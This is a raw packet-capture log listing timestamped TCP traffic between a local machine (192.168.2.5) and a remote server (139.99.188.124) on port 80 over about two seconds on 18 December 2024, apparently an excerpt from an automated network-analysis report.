                                                                    Dec 18, 2024 09:13:12.256968021 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:12.376707077 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:12.376806974 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:12.417023897 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:12.536755085 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.875879049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.875905991 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.875917912 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.875976086 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:13.876049042 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.876060963 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.876071930 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.876082897 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.876094103 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:13.876095057 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.876123905 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:13.876149893 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:13.876430988 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.876442909 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.876503944 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:13.996063948 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.996098042 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:13.996431112 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.085616112 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.085632086 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.085731030 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.089788914 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.089898109 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.089963913 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.098320961 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.098335028 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.098387003 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.106323957 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.106338024 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.106405020 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.114542961 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.115091085 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.118273973 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.122986078 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.123156071 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.123223066 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.131414890 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.131833076 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.131889105 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.139806032 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.139822960 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.139880896 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.148103952 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.148186922 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.150141954 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.156435013 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.156593084 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.157187939 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.164829016 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.164941072 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.166420937 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.295455933 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.295495987 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.296570063 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.298065901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.299079895 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.299211979 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.300142050 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.304526091 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.304634094 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.304714918 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.310043097 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.310107946 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.310161114 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.315411091 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.315480947 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.315531015 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.320833921 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.320933104 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.320945024 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.326297045 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.326342106 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.326400042 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.331758022 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.331808090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.331840992 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.337147951 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.337415934 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.337747097 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.342627048 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.342737913 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.342808962 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.348129034 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.348197937 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.348217964 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.353514910 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.353648901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.354919910 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.358932972 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.359074116 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.362129927 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.364342928 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.364479065 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.366122961 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.369872093 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.370044947 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.370117903 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.375248909 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.375435114 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.376435041 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.380649090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.380733013 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.380810976 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.386110067 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.386277914 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.386508942 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.391546011 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.394489050 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.504801989 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.504853964 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.504987955 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.506045103 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.506139994 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.506206036 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.510212898 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.510421038 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.510488987 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.514276981 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.514394999 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.514533043 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.518395901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.518573046 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.520114899 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.522367001 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.522505045 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.523968935 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.526262999 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.526343107 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.527240038 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.530277967 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.530374050 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.532113075 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.534287930 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.534377098 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.534960032 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.538208008 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.538331032 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.538450003 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.542390108 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.542452097 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.542838097 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.546243906 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.546303988 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.550250053 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.550306082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.550364971 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.550411940 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.554207087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.554260015 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.554574966 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.558207035 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.558382034 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.558429003 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.562217951 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.562372923 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.562438965 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.566392899 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.566466093 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.566643953 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.570168972 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.570219994 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.570452929 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.574259996 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.574314117 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.574367046 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.578178883 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.578375101 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.579413891 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.582145929 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.582242966 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.582468987 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.586111069 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.586210012 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.586656094 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.590116024 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.590179920 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.590240955 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.594088078 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.594336033 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.594402075 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.598069906 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.598160982 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.598381042 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.602052927 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.602173090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.602305889 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.606007099 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.606141090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.606350899 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.610106945 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.610202074 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.610429049 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.614027977 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.614175081 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.614368916 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.617974997 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.618130922 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.618269920 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.621978998 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.622189045 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.622284889 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.625972033 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.653995991 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.714093924 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.714189053 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.714220047 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.715538979 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.715619087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.715652943 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.718528986 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.718916893 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.719602108 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.719700098 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.719763041 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.722567081 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.722630978 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.722688913 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.725629091 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.725696087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.725874901 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.728399038 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.728504896 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.728626966 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.731256008 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.731400967 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.731528044 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.734338045 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.734402895 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.734620094 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.736836910 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.736993074 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.737056017 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.739559889 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.739670992 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.739753008 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.742244005 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.742382050 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.742607117 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.745003939 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.745057106 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.745155096 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.747622013 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.747868061 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.747940063 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.750247955 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.750299931 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.750382900 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.752805948 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.752890110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.752959967 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.755433083 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.755503893 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.755742073 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.758043051 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.758188963 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.758373022 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.760622978 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.760746002 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.760816097 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.763269901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.763370037 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.763452053 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.765786886 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.766079903 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.766143084 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.768415928 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.768606901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.768673897 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.771011114 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.771171093 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.771291971 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.773610115 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.773699045 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.773824930 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.776258945 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.776304960 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.776421070 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.778815031 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.778923035 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.779087067 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.781418085 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.781505108 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.781608105 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.783997059 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.784116030 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.784276009 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.786586046 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.786808968 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.786864996 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.789208889 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.789263010 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.789323092 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.791840076 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.791874886 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.791939974 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.794477940 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.794523954 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.794609070 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.797002077 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.797107935 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.797245979 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.799689054 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.799715996 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.799773932 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.802349091 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.802387953 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.802673101 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.804850101 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.804913998 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.804964066 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.807439089 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.807554007 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.807730913 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.810045958 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.810152054 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.810390949 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.812616110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.812743902 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.812803984 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.815228939 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.815412045 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.815504074 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.817873001 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.817972898 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.818030119 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.820468903 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.820544004 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.820605040 CET4971680192.168.2.5139.99.188.124
